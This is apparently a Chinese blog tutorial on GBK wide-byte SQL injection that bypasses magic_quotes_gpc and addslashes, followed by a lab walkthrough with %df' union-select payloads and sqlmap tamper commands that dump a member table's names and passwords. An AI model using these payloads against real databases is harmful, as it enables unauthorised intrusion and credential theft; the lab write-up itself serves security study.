sql宽字节注入

magic_quotes_gpc(魔术引号开关)

https://www.cnblogs.com/timelesszhuang/p/3726736.html

magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符"\",以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。

单引号(')、双引号(")、反斜线(\)等字符都会被加上反斜线

magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤

addslashes()函数

二者关系

php get_magic_quotes_gpc() stripslashes()和addslashes()的关系-CSDN博客

PHP为了安全性,所以引入了个magic_quotes_gpc = On的功能,可以不需要做任何处理就能直接把单引号插入数据库中,那么对于Off时,则需要考虑单引号的问题了,而不是一味地信任运行环境。

magic_quotes_gpc = On时,使用了addslashes()处理后的数据在数据库中将以\'形式保存,如果此时直接输出的话,就会发现比自己期待的内容多了个\,因此stripslashes()出场了,它能把\去掉(区别于str_replace("\", "",$Str))。

magic_quotes_gpc = Off时,使用了addslashes()处理后的数据在数据库中将以'形式保存,没有上面说的有\的问题,addslashes()起到插入数据不出错的作用,如果此时直接输出的话,数据正常。不需要再用stripslashes()。addslashes()和stripslashes()正好是相反的,直接记忆:addslashes()加个\,stripslashes()去个\

那么什么时候用呢?

简单说:

当magic_quotes_gpc = On时,系统会自动处理单引号等问题,用不用addslashes()和stripslashes()都没关系,但是如果添加数据时用了addslashes(),那么显示数据时必须要stripslashes()

当magic_quotes_gpc = Off时,系统不会处理单引号等问题,所以插入数据时必须要使用addslashes(),显示数据时则不需要使用stripslashes()。

既然有了分析,做程序时要怎么办呢?根据以上两种情况,可得:

不管magic_quotes_gpc是On还是Off,添加数据时用addslashes(),当On时,必须使用stripslashes(),Off时则不能用stripslashes()。

为了绕过magic_quotes_gpc的\,于是乎我们开始导入宽字节的概念

我们发现\的编码是%5c,然后我们会想到传参一个字符想办法凑成一个gbk字符,例如:'運'字是%df%5c

SELECT * FROM users WHERE id='1\'' LIMIT 0,1

这条语句因为\使我们无法去注入,那么我们是不是可以用%df吃到%5c,因为如果用GBK编码的话这个就是運,然后成功的让!

SELECT * FROM users WHERE id='1�\'#' LIMIT 0,1

�\ 实际上就是那个運字

宽字节概念

1、单字节字符集:所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127)

2、多字节字符集:在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。

3、UTF-8 编码: 是一种编码的编码方式(多字节编码),它可以使用1~4个字节表示一个符号,根据不同的符号而变化字节长度。

4、宽字节注入时利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字

宽字节sql注入

宽字节SQL注入就是PHP发送请求到MySql时使用了语句

SET NAMES 'gbk' 或是SET character_set_client =gbk 进行了一次编码,但是又由于一些不经意的字符集转换导致了宽字节注入。

实战(墨者)

手工

找到注入点

发现3,5是回显点

?id=-1%df' union select 1,2,database(),4,5--+

?id=-1%df' union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database() --+

然后我们在查询列名的时候,发现因为单引号无法闭合而报错

?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='stormgroup_member' --+

这里应该怎么解决呢?

看了wp,转成了十六进制

嗯。。不错

payload:

?id=-1%df' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572 --+

有了

?id=-1%df' union select 1,2,3,4,group_concat(name) from stormgroup_member --+

?id=-1%df' union select 1,2,3,4,group_concat(password) from stormgroup_member --+

tamper

sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py --dbs
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py -D mozhe_discuz_stormgroup --tables
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py -D mozhe_discuz_stormgroup -T stormgroup_member --columns
sqlmap.py -u "http://124.70.71.251:48968/new_list.php?id=1" --tamper=unmagicquotes.py -D mozhe_discuz_stormgroup -T stormgroup_member --dump
相关推荐
锐策25 分钟前
〔 MySQL 〕数据类型
数据库·mysql
天天要nx1 小时前
D68【python 接口自动化学习】- python基础之数据库
数据库·python
Allen Bright1 小时前
Redis安装
数据库·redis·缓存
门牙咬脆骨1 小时前
【MYSQL】数据库日志 (了解即可)
数据库·mysql
ModelBulider1 小时前
十三、注解配置SpringMVC
java·开发语言·数据库·sql·mysql
豆 腐1 小时前
MySQL【四】
android·数据库·笔记·mysql
熊明才2 小时前
Ubuntu 22.04.4 LTS + certbot 做自动续签SSL证书(2024-11-14亲测)
数据库·网络协议·ssl
用户6279947182622 小时前
GBase 8a MPP Cluster基于审计日志的冷温热数据分析
数据库
用户6279947182622 小时前
快速搭建南大通用GBase 8s数据库SSC共享存储集群
数据库
FIN技术铺4 小时前
问:数据库的六种锁机制实践总结?
数据库·sql·oracle